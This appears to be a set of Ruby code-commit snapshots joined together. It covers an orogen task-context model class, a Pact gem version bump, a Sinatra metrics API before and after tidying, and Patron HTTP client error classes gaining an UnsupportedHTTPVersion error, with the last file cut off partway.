# this model or on one of its superclasses.
#
# NOTE(review): for locally-defined states the returned value is
# actually the state kind (a Symbol), which is truthy — callers
# should treat the result as a boolean only.
def state?(name)
  state_kind(name) || (superclass.state?(name.to_s) if superclass)
end
# The set of kinds a state can be declared as
STATE_TYPES = [ :toplevel, :runtime, :error, :fatal ]

# Internal method for state definition
#
# +name+ is the state name and +type+ one of STATE_TYPES. Enables
# the extended state support on first use. Redefining an existing
# state with the same kind is a no-op; redefining it with a
# different kind raises ArgumentError.
def define_state(name, type) # :nodoc:
  name = name.to_s
  type = type.to_sym
  if !STATE_TYPES.include?(type)
    raise ArgumentError, "unknown state type #{type.inspect}"
  end
  if !extended_state_support?
    extended_state_support
  end

  if kind = state_kind(name.to_s)
    if kind != type
      raise ArgumentError, "state #{name} is already defined as #{kind}, cannot overload into #{type}"
    end
  else
    @states << [name, type]
    # keep the state list sorted by name so that code generation is
    # stable across runs
    @states = @states.sort_by { |n, _| n }
  end
end
# Returns the kind (one of STATE_TYPES) of the state called +name+,
# or nil if no such state is defined.
def state_kind(name) # :nodoc:
  entry = each_state.find { |state_name, _| state_name == name }
  entry[1] if entry
end
# Name of the generated C++ enumeration that holds this task's
# state values.
def state_type_name # :nodoc:
  "%s_STATES" % basename
end
# C++ identifier used for the given state when the enumeration
# value is emitted at global scope.
def state_global_value_name(state_name, state_type) # :nodoc:
  "%s_%s" % [basename, state_name.upcase]
end
# C++ identifier used for the given state when the enumeration
# value is emitted inside the task class' own scope.
def state_local_value_name(state_name, state_type) # :nodoc:
  state_name.upcase
end
##
# :method: each_runtime_state
#
# Enumerates all the runtime states
#
# See also #each_error_state, #each_fatal_state and #each_state

##
# :method: each_error_state
#
# Enumerates all error states defined for this task context
#
# See also #each_runtime_state, #each_fatal_state, and #each_state

##
# :method: each_fatal_state
#
# Enumerates all fatal error states defined for this task context
#
# See also #each_runtime_state, #each_error_state and #each_state

# Generates each_toplevel_state, each_runtime_state,
# each_error_state and each_fatal_state: each filters #each_state
# on the state kind and yields the state names only (or returns an
# Enumerator when called without a block).
STATE_TYPES.each do |type|
  class_eval <<-EOD
  def each_#{type}_state
      if block_given?
          each_state do |name, type|
              yield(name) if type == :#{type}
          end
      else
          enum_for(:each_#{type}_state)
      end
  end
  EOD
end
# Enumerates each state defined on this task context, as
# [name, kind] pairs. States inherited from the superclass chain
# are yielded first. Returns an Enumerator if no block is given.
def each_state(&block)
  if block_given?
    superclass.each_state(&block) if superclass
    @states.each(&block)
  else
    enum_for(:each_state)
  end
end
# call-seq:
#   states -> set of states
#
# Declares a toplevel state. It should be used only to declare RTT's
# TaskContext states.
#
# When called without arguments, returns the raw array of
# [name, kind] pairs defined at this level of the hierarchy.
def states(*state_names) # :nodoc:
  if state_names.empty?
    return @states
  end

  state_names.each do |name|
    define_state(name, :toplevel)
  end
end
# Declares a certain number of runtime states
#
# This method will do nothing if it defines a state that is already
# defined by one of the superclasses.
#
# See #error_states, #each_state, #each_runtime_state
def runtime_states(*state_names)
  state_names.each { |state_name| define_state(state_name, :runtime) }
end
# Declares a certain number of runtime error states
#
# This method will do nothing if it defines a state that is already
# defined by one of the superclasses.
#
# See #runtime_states, #each_state, #each_error_state
def error_states(*state_names)
  state_names.each { |state_name| define_state(state_name, :error) }
end
# Declares a certain number of fatal error states
#
# This method will do nothing if it defines a state that is already
# defined by one of the superclasses.
#
# See #runtime_states, #error_states, #each_state, #each_error_state
def fatal_states(*state_names)
  state_names.each { |state_name| define_state(state_name, :fatal) }
end
# This method is an easier way to use boost::shared_ptr in a task
# context interface. For instance, instead of writing
#
#   input_port 'image', '/boost/shared_ptr</Image>'
#
# you can write
#
#   input_port 'image', shared_ptr('/Image')
#
# Additionally, this method makes sure that the corresponding type
# is actually defined on the project's toolkit.
def shared_ptr(name)
  base_type = component.find_type(name)
  full_name = "/boost/shared_ptr<#{base_type.name}>"
  begin
    component.find_type(full_name)
  rescue Typelib::NotFound
    # The shared_ptr type is not defined yet: declare it on the
    # toolkit and resolve it again
    component.toolkit { shared_ptr(name) }
    component.find_type(full_name)
  end
end
# This method is an easier way to use RTT::ReadOnlyPointer in a task
# context interface. For instance, instead of writing
#
#   input_port 'image', '/RTT/ReadOnlyPointer</Image>'
#
# you can write
#
#   input_port 'image', ro_ptr('/Image')
#
# Additionally, this method makes sure that the corresponding type
# is actually defined on the project's toolkit.
#
# Raises ArgumentError if the base type itself is not available.
def ro_ptr(name)
  base_type =
    begin
      component.find_type(name)
    rescue Typelib::NotFound
      raise ArgumentError, "type #{name} is not available"
    end

  full_name = "/RTT/ReadOnlyPointer<#{base_type.name}>"
  begin
    component.find_type(full_name)
  rescue Typelib::NotFound
    # The pointer type is not defined yet: declare it on the
    # toolkit and resolve it again
    component.toolkit { ro_ptr(name) }
    component.find_type(full_name)
  end
end
# Create a new method with the given name. Use the returned Method
# object to configure the method further.
#
# In Orocos, a method is a synchronous method call to a task context:
# the caller will block until the method's procedure is called
#
# NOTE(review): this definition shadows Ruby's built-in
# Object#method on instances of this class; use instance_method or
# Object#method via an unbound method if reflection is needed.
def method(name)
  @methods << Method.new(self, name)
  @methods.last
end
# The set of commands that have been added at this level of the
# class hierarchy, i.e. commands whose name does not appear in any
# superclass.
def new_commands
  super_names = superclass.all_commands.map(&:name).to_set
  @commands.find_all do |command|
    # BUGFIX: compare by name — +command+ is a Command object while
    # +super_names+ contains plain name strings, so the previous
    # include?(command) was always false
    !super_names.include?(command.name)
  end
end
# The set of commands that are overloaded in this task class, i.e.
# commands that are redefined here while already being defined on a
# superclass.
def overloaded_commands
  super_names = superclass.all_commands.map(&:name).to_set
  @commands.find_all do |command|
    # BUGFIX: this was a copy-paste of #new_commands. An overloaded
    # command is one whose name DOES exist in the superclass, and
    # the comparison must use the command's name, not the object.
    super_names.include?(command.name)
  end
end
# Create a new command with the given name. Use the returned
# Command object to configure the command further. In Orocos, a
# command is an asynchronous method call to a task context.
#
# The generated class will have a <tt>_[command name]</tt>
# attribute of class RTT::Command<>. For instance,
#
#   command('my_command').
#       doc 'description of command'
#
# will generate an attribute <tt>_my_command</tt> of type
# RTT::Command.
def command(name)
  @commands << Command.new(self, name)
  @commands.last
end
##
# :method: each_dynamic_port
# :call-seq:
# each_dynamic_port(only_self = false) { |port| }
#
# Yields all dynamic ports that are defined on this task context.
##
# :method: all_dynamic_ports
# :call-seq:
# all_dynamic_ports -> set_of_ports
#
# Returns the set of all dynamic ports that are defined on this task
# context
##
# :method: self_dynamic_ports
# :call-seq:
# self_dynamic_ports -> set_of_ports
#
# Returns the set of dynamic ports that are added at this level of
# the model hierarchy. I.e. ports that are defined on this task
# context, but not on its parent models.
# Generated by the enumerate_inherited_set metaprogramming helper:
# defines each_dynamic_port, all_dynamic_ports and self_dynamic_ports
enumerate_inherited_set("dynamic_port", "dynamic_ports")
##
# :method: each_port
# :call-seq:
# each_port(only_self = false) { |port| }
#
# Yields all static ports that are defined on this task context.
##
# :method: all_ports
# :call-seq:
# all_ports -> set_of_ports
#
# Returns the set of all static ports that are defined on this task
# context
##
# :method: self_ports
# :call-seq:
# self_ports -> set_of_ports
#
# Returns the set of static ports that are added at this level of
# the model hierarchy. I.e. ports that are defined on this task
# context, but not on its parent models.
# Generated by the enumerate_inherited_set metaprogramming helper:
# defines each_port, all_ports and self_ports
enumerate_inherited_set("port", "ports")
##
# :method: each_property
# :call-seq:
# each_property(only_self = false) { |property| }
#
# Yields all properties that are defined on this task context.
##
# :method: all_properties
# :call-seq:
# all_properties -> set_of_properties
#
# Returns the set of all properties that are defined on this task
# context
##
# :method: self_properties
# :call-seq:
# self_properties -> set_of_properties
#
# Returns the set of properties that are added at this level of the
# model hierarchy. I.e. properties that are defined on this task
# context, but not on its parent models.
# Generated by the enumerate_inherited_set metaprogramming helper:
# defines each_property, all_properties and self_properties
enumerate_inherited_set("property", "properties")
##
# :method: each_command
# :call-seq:
# each_command(only_self = false) { |command| }
#
# Yields all commands that are defined on this task context.
##
# :method: all_commands
#
# :call-seq:
# all_commands -> set_of_commands
#
# Returns the set of all commands that are defined on this task
# context
##
# :method: self_commands
# :call-seq:
# self_commands -> set_of_commands
#
# Returns the set of commands that are added at this level of the
# model hierarchy. I.e. commands that are either newly defined on
# this task context, or overload commands from the parent models.
# Generated by the enumerate_inherited_set metaprogramming helper:
# defines each_command, all_commands and self_commands
enumerate_inherited_set("command", "commands")
##
# :method: each_method
# :call-seq:
# each_method(only_self = false) { |method| ... }
#
# Yields all methods that are defined on this task context.
##
# :method: all_methods
# :call-seq:
# all_methods -> set_of_methods
#
# Returns the set of all methods that are defined on this task
# context
##
# :method: self_methods
# :call-seq:
# self_methods -> set_of_methods
#
# Returns the set of methods that are added at this level of the
# model hierarchy. I.e. methods that are either newly defined on
# this task context, or overload methods from the parent models.
# Generated by the enumerate_inherited_set metaprogramming helper:
# defines each_method, all_methods and self_methods
enumerate_inherited_set("method", "methods")
# Methods that are added by this task context (i.e. methods that are
# defined here but are not present in the superclass)
def new_methods
  super_names = superclass.all_methods.map(&:name).to_set
  @methods.find_all do |m|
    # BUGFIX: compare by name — +m+ is a Method object while
    # +super_names+ holds name strings, so include?(m) was always
    # false and every method was reported as new
    !super_names.include?(m.name)
  end
end
# call-seq:
#   output_port 'name', '/type'
#
# Add a new output (write) port with the given name and type, and
# return the corresponding OutputPort object.
#
# Raises ConfigError if the type is not declared.
#
# See also #input_port
def output_port(name, type)
  check_uniqueness(:ports, name)
  port = OutputPort.new(self, name, type)
  @ports << port
  port
rescue Typelib::NotFound
  raise ConfigError, "type #{type} is not declared"
end
# Enumerates the output ports available on this task context. If no
# block is given, returns the corresponding enumerator object.
def each_output_port(&block)
  each_port.select { |port| port.kind_of?(OutputPort) }.each(&block)
end
# Returns the port named +name+ or raises ArgumentError if no such
# port exists
def port(name)
  found = each_port.find { |candidate| candidate.name == name }
  raise ArgumentError, "#{self} has no port named '#{name}'" unless found
  found
end
# call-seq:
#   input_port 'name', '/type'
#
# Add a new input (read) port with the given name and type, and
# returns the corresponding InputPort object.
#
# Raises ConfigError if the type is not declared.
#
# See also #output_port
def input_port(name, type)
  check_uniqueness(:ports, name)
  @ports << InputPort.new(self, name, type)
  @ports.last
rescue Typelib::NotFound
  raise ConfigError, "type #{type} is not declared"
end
# call-seq:
#   dynamic_input_port name_regex, typename
#
# Declares that a port whose name matches name_regex can be declared
# at runtime, with the type. This is not used by orogen itself, but
# can be used by potential users of the orogen specification.
def dynamic_input_port(name, type)
  port = DynamicInputPort.new(self, name, type)
  dynamic_ports << port
  port
end
# call-seq:
#   dynamic_output_port name_regex, typename
#
# Declares that a port whose name matches name_regex can be declared
# at runtime, with the type. This is not used by orogen itself, but
# can be used by potential users of the orogen specification.
def dynamic_output_port(name, type)
  port = DynamicOutputPort.new(self, name, type)
  dynamic_ports << port
  port
end
# Returns true if there is a dynamic port definition that matches
# the given name and type pair.
#
# If +type+ is nil, the type is ignored in the matching.
def dynamic_port?(name, type)
  return true if dynamic_input_port?(name, type)
  dynamic_output_port?(name, type)
end
# Returns the set of dynamic input port definitions that match the
# given name and type pair. If +type+ is nil, the type is ignored in
# the matching.
#
# Note that the declared port name is matched with ===, so dynamic
# port declarations may use regular expressions as names.
def find_dynamic_input_ports(name, type)
  dynamic_ports.find_all { |p| p.kind_of?(InputPort) && (!type || p.type == component.find_type(type)) && p.name === name }
end
# Returns true if there is a dynamic input port definition matching
# the given name and type pair. If +type+ is nil, the type is
# ignored in the matching.
def dynamic_input_port?(name, type = nil)
  matches = find_dynamic_input_ports(name, type)
  !matches.empty?
end
# Returns the set of dynamic output port definitions that match the
# given name and type pair. If +type+ is nil, the type is ignored in
# the matching.
#
# Note that the declared port name is matched with ===, so dynamic
# port declarations may use regular expressions as names.
def find_dynamic_output_ports(name, type)
  dynamic_ports.find_all { |p| p.kind_of?(OutputPort) && (!type || p.type == component.find_type(type)) && p.name === name }
end
# Returns true if an output port of the given name and type could be
# created at runtime.
def dynamic_output_port?(name, type = nil)
  matches = find_dynamic_output_ports(name, type)
  !matches.empty?
end
# Enumerates the input ports available on this task context. If no
# block is given, returns the corresponding enumerator object.
def each_input_port(&block)
  each_port.select { |port| port.kind_of?(InputPort) }.each(&block)
end
# A set of ports that will trigger this task when they get updated.
attr_reader :event_ports
# Declares that this task context is designed to be woken up when
# new data is available on one of the given ports (or all already
# defined ports if no names are given).
#
# Only input ports may be used as triggers; ArgumentError is raised
# for any other port.
def port_driven(*names)
  names = names.map { |n| n.to_s }
  # With no names, every input port defined so far becomes a trigger
  relevant_ports = if names.empty? then all_ports.find_all { |p| p.kind_of?(InputPort) }
  else
    names.map do |n|
      obj = get_object(:ports, n)
      if !obj.kind_of?(InputPort)
        raise ArgumentError, "only read ports can be used as triggers for a task context"
      end
      obj
    end
  end

  @event_ports.concat(relevant_ports)
end
# Declares that this task context is designed to be woken up when
# new data is available on a I/O file descriptor. The resulting task
# must also use the fd_driven activity, which is done by default.
#
# The only thing you have to do in the implementation is therefore
#
#   task = task("MyDFDrivenTask").
#       start
#
# To configure the activity, you will have to implement the
# getFileDescriptor() method that is generated in the target class.
def fd_driven
  default_activity "fd_driven"
  # FD-driven tasks are declared as needing configuration before
  # they can be started
  needs_configuration
end
# True if this task context's default activity is a FD-driven
# activity
def fd_driven?
  kind = default_activity.first
  :fd_driven == kind
end
# The set of task libraries from which we depend on, because of our
# superclasses and implements
def used_task_libraries
  component.used_task_libraries.find_all do |tasklib|
    # keep the library only if it declares at least one task model
    # that this task context implements
    tasklib.tasks.any? do |task|
      task.component == tasklib && implements?(task.name)
    end
  end
end
# Returns the set of types that are used to define this task
# context, as an array of subclasses of Typelib::Type.
#
# Aggregates the types used by all properties, methods, commands
# and ports (including inherited ones), without duplicates.
def interface_types
  (all_properties + all_methods + all_commands + all_ports).
    map { |obj| obj.used_types }.
    flatten.to_value_set.to_a
end
# Returns the set of toolkits that define the types used in this
# task's interface. They are required at compile and link time
# because of the explicit instanciation of interface templates
# (ports, ...)
def used_toolkits
  types = interface_types
  component.used_toolkits.find_all do |tk|
    # keep a toolkit if it defines at least one interface type
    types.any? do |type|
      tk.includes?(type.name)
    end
  end.to_value_set
end
# Generate the code files for this task. This builds two classes:
#
# * a #{task.name}Base class in .orogen/tasks/#{task.name}Base.{cpp,hpp}
#   which is the automatically generated part of the task.
# * a #{task.name} class in tasks/#{task.name}.{cpp,hpp} which is
#   the user-provided part of the task. This class is a public
#   subclass of the Base class.
#
# Returns self.
def generate
  # Tasks imported from another project are not generated here
  return if external_definition?

  # Make this task be available in templates as 'task'
  task = self

  base_code_cpp = Generation.render_template 'tasks', 'TaskBase.cpp', binding
  base_code_hpp = Generation.render_template 'tasks', 'TaskBase.hpp', binding
  Generation.save_automatic "tasks", "#{basename}Base.cpp", base_code_cpp
  Generation.save_automatic "tasks", "#{basename}Base.hpp", base_code_hpp

  code_cpp = Generation.render_template "tasks", "Task.cpp", binding
  code_hpp = Generation.render_template "tasks", "Task.hpp", binding
  Generation.save_user "tasks", "#{basename}.cpp", code_cpp
  Generation.save_user "tasks", "#{basename}.hpp", code_hpp

  # Symlink the generated headers into a per-component directory.
  # NOTE(review): presumably this mirrors the installed header
  # layout so that in-build #include paths resolve — confirm.
  fake_install_dir = File.join(component.base_dir, AUTOMATIC_AREA_NAME, component.name)
  FileUtils.mkdir_p fake_install_dir
  FileUtils.ln_sf File.join(component.base_dir, "tasks", "#{basename}.hpp"),
    File.join(fake_install_dir, "#{basename}.hpp")
  FileUtils.ln_sf File.join(component.base_dir, AUTOMATIC_AREA_NAME, "tasks", "#{basename}Base.hpp"),
    File.join(fake_install_dir, "#{basename}Base.hpp")
  self
end
# Generate a graphviz fragment to represent this task
def to_dot
  # Graphviz HTML-like labels require &, < and > to be escaped.
  # BUGFIX: the previous lambda replaced '<' with '<' and '>' with
  # '>' (a no-op — the &lt;/&gt; entities had been lost), producing
  # invalid labels whenever a type name contained template brackets.
  html_escape = lambda { |s| s.gsub(/&/, "&amp;").gsub(/</, "&lt;").gsub(/>/, "&gt;") }
  # Renders a one-column HTML table with a title row and a body row
  html_table = lambda do |title, lines|
    label = "<TABLE BORDER=\"0\" CELLBORDER=\"1\" CELLSPACING=\"0\">\n"
    label << " <TR><TD>#{title}</TD></TR>\n"
    label << " <TR><TD>\n"
    label << lines.join("<BR/>\n")
    label << " </TD></TR>\n"
    label << "</TABLE>"
  end

  result = ""
  result << " node [shape=none,margin=0,height=.1];"

  label = ""
  label << "<TABLE BORDER=\"0\" CELLBORDER=\"0\" CELLSPACING=\"0\">\n"
  label << " <TR><TD>#{name}</TD></TR>"
  properties = all_properties.
    map { |p| "#{p.name} [#{html_escape[p.type_name]}]" }
  if !properties.empty?
    label << " <TR><TD>#{html_table["Properties", properties]}</TD></TR>"
  end

  input_ports = all_ports.
    find_all { |p| p.kind_of?(InputPort) }.
    map { |p| "#{p.name} [#{html_escape[p.type_name]}]" }
  if !input_ports.empty?
    label << " <TR><TD>#{html_table["Input ports", input_ports]}</TD></TR>"
  end

  output_ports = all_ports.
    find_all { |p| p.kind_of?(OutputPort) }.
    map { |p| "#{p.name} [#{html_escape[p.type_name]}]" }
  if !output_ports.empty?
    label << " <TR><TD>#{html_table["Output ports", output_ports]}</TD></TR>"
  end

  label << "</TABLE>"
  result << " t#{object_id} [label=<#{label}>]"
  result
end
end
end
end
|
module Pact
  # Gem version, following major.minor.patch semantic versioning
  VERSION = "0.1.4"
end
Bumping micro version
module Pact
  # Gem version, following major.minor.patch semantic versioning
  VERSION = "0.1.5"
end
|
require 'sinatra'
require 'haml'
require 'mongoid'
require 'rack/conneg'
require 'iso8601'
require 'dotenv'
require 'kramdown'
require 'rack-google-analytics'
require_relative 'models/metrics'
require_relative 'pancreas-api/helpers'
require_relative 'pancreas-api/racks'
require_relative 'pancreas-api/errors'
Dotenv.load unless ENV['RACK_ENV'] == 'test'
Mongoid.load!(File.expand_path("../mongoid.yml", File.dirname(__FILE__)), ENV['RACK_ENV'])
class PancreasApi < Sinatra::Base
  # Landing page (HTML only)
  get '/' do
    respond_to do |wants|
      wants.html {
        haml :index, :locals => {
          :title => 'pancreas-api',
          :text => 'pancreas-api',
          :bootstrap_theme => '../lavish-bootstrap.css',
          :github => {
            :user => 'pikesley',
            :project => 'HbA1c',
            :ribbon => 'right_gray_6d6d6d'
          }
        }
      }
      wants.other { error_406 }
    end
  end

  # List every known metric name with a link to its JSON resource
  get '/metrics' do
    protected!
    data = {
      "metrics" => Metric.all.distinct(:name).sort.map do |name|
        {
          name: name,
          url: "https://#{request.host}/metrics/#{name}.json"
        }
      end
    }
    respond_to do |wants|
      wants.json { data.to_json }
      wants.other { error_406 }
    end
  end

  # Record a datapoint for a metric. The JSON body must contain at
  # least "datetime" and "value". An existing datapoint for the same
  # metric and datetime is updated rather than duplicated.
  post '/metrics/:metric' do
    protected!
    begin
      j = JSON.parse request.body.read
    rescue JSON::ParserError
      error_400("request body is not valid JSON")
    end
    # JSON.parse yields string keys, so use a string key here too
    j["name"] = params[:metric]
    # BUGFIX: scope by metric name AND datetime. Matching on datetime
    # alone would update datapoints belonging to OTHER metrics that
    # were recorded at the same instant.
    existing = Metric.where(:name => params[:metric], :datetime => DateTime.parse(j["datetime"]))
    if existing.first
      if existing.update(value: j["value"])
        return 201
      else
        return 500
      end
    else
      @metric = Metric.new j
      if @metric.save
        return 201
      else
        return 500
      end
    end
  end

  # Latest datapoint for a metric
  get '/metrics/:metric' do
    protected!
    @metric = Metric.where(name: params[:metric]).order_by(:datetime.asc).last
    respond_to do |wants|
      wants.json { @metric.to_json }
      wants.other { error_406 }
    end
  end

  # Latest datapoint at or before the given ISO8601 datetime
  get '/metrics/:metric/:datetime' do
    protected!
    time = DateTime.parse(params[:datetime]) rescue error_400("'#{params[:datetime]}' is not a valid ISO8601 date/time.")
    @metric = Metric.where(name: params[:metric], :datetime.lte => time).order_by(:datetime.asc).last
    respond_to do |wants|
      wants.json { @metric.to_json }
      wants.other { error_406 }
    end
  end

  # Datapoints in a range. :from/:to may be ISO8601 datetimes,
  # ISO8601 durations (starting with 'P', relative to the other
  # bound) or '*' for an open end.
  get '/metrics/:metric/:from/:to' do
    protected!
    start_date = DateTime.parse(params[:from]) rescue nil
    end_date = DateTime.parse(params[:to]) rescue nil

    if params[:from] =~ /^P/
      start_date = end_date - ISO8601::Duration.new(params[:from]).to_seconds.seconds rescue error_400("'#{params[:from]}' is not a valid ISO8601 duration.")
    end
    if params[:to] =~ /^P/
      end_date = start_date + ISO8601::Duration.new(params[:to]).to_seconds.seconds rescue error_400("'#{params[:to]}' is not a valid ISO8601 duration.")
    end

    invalid = []
    invalid << "'#{params[:from]}' is not a valid ISO8601 date/time." if start_date.nil? && params[:from] != "*"
    invalid << "'#{params[:to]}' is not a valid ISO8601 date/time." if end_date.nil? && params[:to] != "*"
    error_400(invalid.join(" ")) unless invalid.blank?

    if start_date && end_date
      error_400("'from' date must be before 'to' date.") if start_date > end_date
    end

    metrics = Metric.where(:name => params[:metric])
    metrics = metrics.where(:datetime.gte => start_date) if start_date
    metrics = metrics.where(:datetime.lte => end_date) if end_date
    metrics = metrics.order_by(:datetime.asc)

    data = {
      :count => metrics.count,
      :values => metrics.map do |metric|
        {
          :datetime => metric.datetime,
          :value => metric.value,
          :category => metric.category
        }
      end
    }
    respond_to do |wants|
      wants.json { data.to_json }
      wants.other { error_406 }
    end
  end

  # start the server if ruby file executed directly
  run! if app_file == $0
end
Tidying up
require 'sinatra'
require 'haml'
require 'mongoid'
require 'iso8601'
require 'dotenv'
require 'kramdown'
require 'rack/conneg'
require 'rack-google-analytics'
require_relative 'models/metrics'
require_relative 'pancreas-api/helpers'
require_relative 'pancreas-api/racks'
require_relative 'pancreas-api/errors'
Dotenv.load unless ENV['RACK_ENV'] == 'test'
Mongoid.load!(File.expand_path('../mongoid.yml', File.dirname(__FILE__)), ENV['RACK_ENV'])
class PancreasApi < Sinatra::Base
  # Landing page (HTML only)
  get '/' do
    respond_to do |wants|
      wants.html {
        haml :index, :locals => {
          :title => 'pancreas-api',
          :text => 'pancreas-api',
          :bootstrap_theme => '../lavish-bootstrap.css',
          :github => {
            :user => 'pikesley',
            :project => 'HbA1c',
            :ribbon => 'right_gray_6d6d6d'
          }
        }
      }
      wants.other { error_406 }
    end
  end

  # List every known metric name with a link to its JSON resource
  get '/metrics' do
    protected!
    data = {
      "metrics" => Metric.all.distinct(:name).sort.map do |name|
        {
          name: name,
          url: "https://#{request.host}/metrics/#{name}.json"
        }
      end
    }
    respond_to do |wants|
      wants.json { data.to_json }
      wants.other { error_406 }
    end
  end

  # Record a datapoint for a metric. The JSON body must contain at
  # least "datetime" and "value". An existing datapoint for the same
  # metric and datetime is updated rather than duplicated.
  post '/metrics/:metric' do
    protected!
    begin
      j = JSON.parse request.body.read
    rescue JSON::ParserError
      error_400("request body is not valid JSON")
    end
    # JSON.parse yields string keys, so use a string key here too
    j["name"] = params[:metric]
    # BUGFIX: scope by metric name AND datetime. Matching on datetime
    # alone would update datapoints belonging to OTHER metrics that
    # were recorded at the same instant.
    existing = Metric.where(:name => params[:metric], :datetime => DateTime.parse(j["datetime"]))
    if existing.first
      if existing.update(value: j["value"])
        return 201
      else
        return 500
      end
    else
      @metric = Metric.new j
      if @metric.save
        return 201
      else
        return 500
      end
    end
  end

  # Latest datapoint for a metric
  get '/metrics/:metric' do
    protected!
    @metric = Metric.where(name: params[:metric]).order_by(:datetime.asc).last
    respond_to do |wants|
      wants.json { @metric.to_json }
      wants.other { error_406 }
    end
  end

  # Latest datapoint at or before the given ISO8601 datetime
  get '/metrics/:metric/:datetime' do
    protected!
    time = DateTime.parse(params[:datetime]) rescue error_400("'#{params[:datetime]}' is not a valid ISO8601 date/time.")
    @metric = Metric.where(name: params[:metric], :datetime.lte => time).order_by(:datetime.asc).last
    respond_to do |wants|
      wants.json { @metric.to_json }
      wants.other { error_406 }
    end
  end

  # Datapoints in a range. :from/:to may be ISO8601 datetimes,
  # ISO8601 durations (starting with 'P', relative to the other
  # bound) or '*' for an open end.
  get '/metrics/:metric/:from/:to' do
    protected!
    start_date = DateTime.parse(params[:from]) rescue nil
    end_date = DateTime.parse(params[:to]) rescue nil

    if params[:from] =~ /^P/
      start_date = end_date - ISO8601::Duration.new(params[:from]).to_seconds.seconds rescue error_400("'#{params[:from]}' is not a valid ISO8601 duration.")
    end
    if params[:to] =~ /^P/
      end_date = start_date + ISO8601::Duration.new(params[:to]).to_seconds.seconds rescue error_400("'#{params[:to]}' is not a valid ISO8601 duration.")
    end

    invalid = []
    invalid << "'#{params[:from]}' is not a valid ISO8601 date/time." if start_date.nil? && params[:from] != "*"
    invalid << "'#{params[:to]}' is not a valid ISO8601 date/time." if end_date.nil? && params[:to] != "*"
    error_400(invalid.join(" ")) unless invalid.blank?

    if start_date && end_date
      error_400("'from' date must be before 'to' date.") if start_date > end_date
    end

    metrics = Metric.where(:name => params[:metric])
    metrics = metrics.where(:datetime.gte => start_date) if start_date
    metrics = metrics.where(:datetime.lte => end_date) if end_date
    metrics = metrics.order_by(:datetime.asc)

    data = {
      :count => metrics.count,
      :values => metrics.map do |metric|
        {
          :datetime => metric.datetime,
          :value => metric.value,
          :category => metric.category
        }
      end
    }
    respond_to do |wants|
      wants.json { data.to_json }
      wants.other { error_406 }
    end
  end

  # start the server if ruby file executed directly
  run! if app_file == $0
end
|
## -------------------------------------------------------------------
##
## Patron HTTP Client: Error definitions
## Copyright (c) 2008 The Hive http://www.thehive.com/
##
## Permission is hereby granted, free of charge, to any person obtaining a copy
## of this software and associated documentation files (the "Software"), to deal
## in the Software without restriction, including without limitation the rights
## to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
## copies of the Software, and to permit persons to whom the Software is
## furnished to do so, subject to the following conditions:
##
## The above copyright notice and this permission notice shall be included in
## all copies or substantial portions of the Software.
##
## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
## IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
## FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
## AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
## LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
## OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
## THE SOFTWARE.
##
## -------------------------------------------------------------------
module Patron
  # Base class for Patron exceptions. Rescue this class to catch any
  # Patron-specific failure.
  class Error < StandardError
  end

  # Gets raised when the URL passed to Patron used a protocol that it
  # does not support. This is most likely the result of a misspelled
  # protocol string.
  class UnsupportedProtocol < Error
  end

  # Gets raised when a request is attempted with an unsupported SSL
  # version.
  class UnsupportedSSLVersion < Error
  end

  # Gets raised when the URL was not properly formatted.
  class URLFormatError < Error
  end

  # Gets raised when the remote host name could not be resolved.
  class HostResolutionError < Error
  end

  # Gets raised when failing to connect to the remote host.
  class ConnectionFailed < Error
  end

  # Gets raised when the response was shorter or larger than expected.
  # This happens when the server first reports an expected transfer
  # size, and then delivers data that doesn't match the previously
  # given size.
  class PartialFileError < Error
  end

  # Gets raised on an operation timeout: the specified time-out
  # period was reached.
  class TimeoutError < Error
  end

  # Gets raised on too many redirects: when following redirects,
  # Patron hit the maximum amount.
  class TooManyRedirects < Error
  end

  # Gets raised when the server specifies an encoding that could not
  # be found, or has an invalid name, or when the server "lies" about
  # the encoding of the response body (such as can be the case when
  # the server specifies an encoding in `Content-Type`) which the
  # HTML generator then overrides with a `meta` element.
  class HeaderCharsetInvalid < Error
  end

  # Gets raised when you try to use `decoded_body` but it can't be
  # represented by your Ruby process's current internal encoding.
  # Subclasses HeaderCharsetInvalid so that existing rescues keep
  # working.
  class NonRepresentableBody < HeaderCharsetInvalid
  end
end
added declaration for UnsupportedHTTPVersion error exception
## -------------------------------------------------------------------
##
## Patron HTTP Client: Error definitions
## Copyright (c) 2008 The Hive http://www.thehive.com/
##
## Permission is hereby granted, free of charge, to any person obtaining a copy
## of this software and associated documentation files (the "Software"), to deal
## in the Software without restriction, including without limitation the rights
## to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
## copies of the Software, and to permit persons to whom the Software is
## furnished to do so, subject to the following conditions:
##
## The above copyright notice and this permission notice shall be included in
## all copies or substantial portions of the Software.
##
## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
## IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
## FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
## AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
## LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
## OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
## THE SOFTWARE.
##
## -------------------------------------------------------------------
module Patron
  # Base class for Patron exceptions. Rescue this class to catch any
  # Patron-specific failure.
  class Error < StandardError
  end

  # Gets raised when the URL passed to Patron used a protocol that it
  # does not support. This is most likely the result of a misspelled
  # protocol string.
  class UnsupportedProtocol < Error
  end

  # Gets raised when a request is attempted with an unsupported SSL
  # version.
  class UnsupportedSSLVersion < Error
  end

  # Gets raised when a request is attempted with an unsupported HTTP
  # version.
  class UnsupportedHTTPVersion < Error
  end

  # Gets raised when the URL was not properly formatted.
  class URLFormatError < Error
  end

  # Gets raised when the remote host name could not be resolved.
  class HostResolutionError < Error
  end

